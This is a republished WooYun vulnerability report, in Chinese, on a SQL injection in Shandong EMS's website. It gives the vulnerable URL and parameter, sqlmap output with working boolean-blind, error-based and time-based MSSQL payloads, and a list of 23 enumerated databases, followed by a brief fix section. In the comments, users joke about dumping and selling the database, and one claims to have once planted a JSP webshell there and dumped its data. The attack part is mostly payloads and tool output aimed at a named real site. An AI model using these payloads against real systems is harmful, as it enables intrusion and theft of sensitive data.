山东ems整站数据库沦陷（不知道有几千张表）

2015年6月1日19:54:58评论251 views字数 226阅读0分45秒阅读模式

摘要

2014-08-27：细节已通知厂商并且等待厂商处理中
2014-08-29：厂商已经确认，细节仅向厂商公开
2014-09-08：细节向核心白帽子及相关领域专家公开
2014-09-18：细节向普通白帽子公开
2014-09-28：细节向实习白帽子公开
2014-10-11：细节向公众公开

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-74081

漏洞标题：山东ems整站数据库沦陷（不知道有几千张表）

漏洞作者：路人甲

提交时间： 2014-08-27 17:23

公开时间： 2014-10-11 17:24

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 19

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： asp+sqlserver注射

0人收藏

漏洞详情

披露状态：

简要描述：

一个注入点，注出了山东ems全站数据库。23个库，随便点了个库，393张表，太多敏感信息。

详细说明：

1.注入点：

http://www.sdems.com.cn/shop/ordershop.asp?id=20104774444030&orderid=1 (GET)

2.payload

code 区域

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
 ---
 Place: GET
 Parameter: id
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=20104774444030%' AND 5635=5635 AND '%'='&orderid=1
 
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: id=20104774444030%' AND 5564=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (5564=5564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(100)+CHAR(111)+CHAR(113))) AND '%'='&orderid=1
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
     Payload: id=20104774444030%' AND 6250=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&orderid=1
 ---
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0
 back-end DBMS: Microsoft SQL Server 2005

3.库：团购。公司OA。ERP。海尔ERP。太多敏感库了

available databases [23]:

[*] DianCMS

[*] EMS_ERPbate

[*] ems_OA

[*] EMSERP

[*] EMSERP_0106

[*] EMSERP_0501

[*] EMSERP_07161

[*] EMSERP_1223

[*] EMSERP_830

[*] EMSERP_910

[*] EMSERPNEAR

[*] emstuan

[*] HaierERP

[*] INGNET_TCG

[*] INGNETERP

[*] master

[*] model

[*] msdb

[*] tempdb

[*] TUAN39

[*] tuangou

[*] WJM

[*] WJM_EN

表太多了，跑的话时间太长，仅截一个库的图做证明。

漏洞证明：

1.注入点：

http://www.sdems.com.cn/shop/ordershop.asp?id=20104774444030&orderid=1 (GET)

库：团购。公司OA。ERP。海尔ERP。太多敏感库了

available databases [23]:

[*] DianCMS

[*] EMS_ERPbate

[*] ems_OA

[*] EMSERP

[*] EMSERP_0106

[*] EMSERP_0501

[*] EMSERP_07161

[*] EMSERP_1223

[*] EMSERP_830

[*] EMSERP_910

[*] EMSERPNEAR

[*] emstuan

[*] HaierERP

[*] INGNET_TCG

[*] INGNETERP

[*] master

[*] model

[*] msdb

[*] tempdb

[*] TUAN39

[*] tuangou

[*] WJM

[*] WJM_EN

表太多了，跑的话时间太长，仅截一个库的图做证明。

修复方案：

首先，sql注入，过滤，大家都知道。

再次，各个网站的数据库都在一起的话，最好站库分离，确保数据库安全,不然一个小漏洞会导致大问题。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-08-29 13:29

厂商回复：

谢谢

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-08-27 21:03 | 野狼 ( 路人 | Rank:0 漏洞数:1 | CcAv TeAm成员，CCAV11站长，白帽子。)

0

嘻嘻，前几天央视报道了个拖顺丰数据库的，要不你拖EMS的数据库卖卖、

1# 回复此人
2014-08-27 21:06 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

0

那就作大新闻了

2# 回复此人
2014-08-29 11:03 | July ( 路人 | Rank:29 漏洞数:11 | 红星闪闪)

0

两年前,这个网站搞得都不搞了,自从脱裤后,管理员就把我的JSP马删了,删了。

3# 回复此人

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-74081

漏洞标题： 山东ems整站数据库沦陷（不知道有几千张表）

相关厂商： 中国邮政集团公司信息技术局

漏洞作者： 路人甲

提交时间： 2014-08-27 17:23

公开时间： 2014-10-11 17:24

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 19

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： asp+sqlserver注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(9) 关注此漏洞

漏洞标题：山东ems整站数据库沦陷（不知道有几千张表）

相关厂商：中国邮政集团公司信息技术局

漏洞作者：路人甲

危害等级：高

漏洞状态：厂商已经确认

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分